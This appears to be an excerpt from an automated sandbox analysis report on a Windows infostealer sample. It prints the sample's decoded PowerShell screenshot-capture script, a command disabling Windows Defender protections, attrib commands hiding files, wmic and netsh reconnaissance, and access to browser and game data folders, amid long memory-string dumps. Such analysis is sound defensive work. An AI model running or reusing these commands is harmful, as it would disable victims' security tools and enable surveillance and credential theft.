                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: Base64 decoded
                          $source = @"
                          using System;
                          using System.Collections.Generic;
                          using System.Drawing;
                          using System.Windows.Forms;
                          public class Screenshot {
                              public static List<Bitmap> CaptureScreens() {
                                  var results = new List<Bitmap>();
                                  var allScreens = Screen.AllScreens;
                                  foreach (Screen screen in allScreens) {
                                      try {
                                          Rectangle bounds = screen.Bounds;
                                          using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) {
                                              using (Graphics graphics = Graphics.FromImage(bitmap)) {
                                                  graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);
                                              }
                                              results.Add((Bitmap)bitmap.Clone());
                                          }
                                      } catch (Exception) {
                                          // Handle any exceptions here
                                      }
                                  }
                                  return results;
                              }
                          }
                          "@
                          Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
                          $screenshots = [Screenshot]::CaptureScreens()
                          for ($i = 0; $i -lt $screenshots.Count; $i++) {
                              $screenshot = $screenshots[$i]
                              $screenshot.Save("./Display ($($i+1)).png")
                              $screenshot.Dispose()
                          }
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile written: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\WdlA0C4PkO.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41CB.tmp" "c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP"
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand [base64-encoded command omitted]
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2020963159.000000C00325E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault 
IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeoznkmimxcczwnwfdf.exeh
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2075138606.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1635706527.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538180801.000000C0001C6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1740768718.000000C0002A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1635706527.000000C00025C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IME
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1474092384.000000C000F10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault 
IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefaul
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1990022251.000000C000152000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1538180801.000000C0001C6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1740768718.000000C0002A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram ManagerHTTP/1.1 200 OK
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2075138606.000000C00012A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IME
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2078092477.000000C004CD4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: new tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IME
                      Source: WdlA0C4PkO.exe, 00000000.00000003.2075138606.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1635706527.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, WdlA0C4PkO.exe, 00000000.00000003.1538180801.000000C0001C6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager
                      Source: WdlA0C4PkO.exe, 00000000.00000003.1544607957.000000C000146000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: New Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeNew Tab - Google ChromeNew Tab - Google Chromenew tab - google chromeProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime l
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Desktop VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Downloads VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Documents VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Documents\My Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Documents\My Videos VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Videos VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Pictures VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\OneDrive VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Public\Downloads VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Public\Documents VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Public\Documents\My Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Desktop VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Documents\My Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Documents\My Pictures VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Pictures VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Default\Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Public\Desktop VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Public\Documents\My Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\Public\Videos VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Downloads VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\AFWAAFRXKO VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\LTKMYBSEYZ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\My Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\My Videos VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\ONBQCLYSPU VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\XZXHAVGRAG VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\My Music VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\My Pictures VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\Documents\ONBQCLYSPU VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: \Device\CdRom0\ VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformationJump to behavior
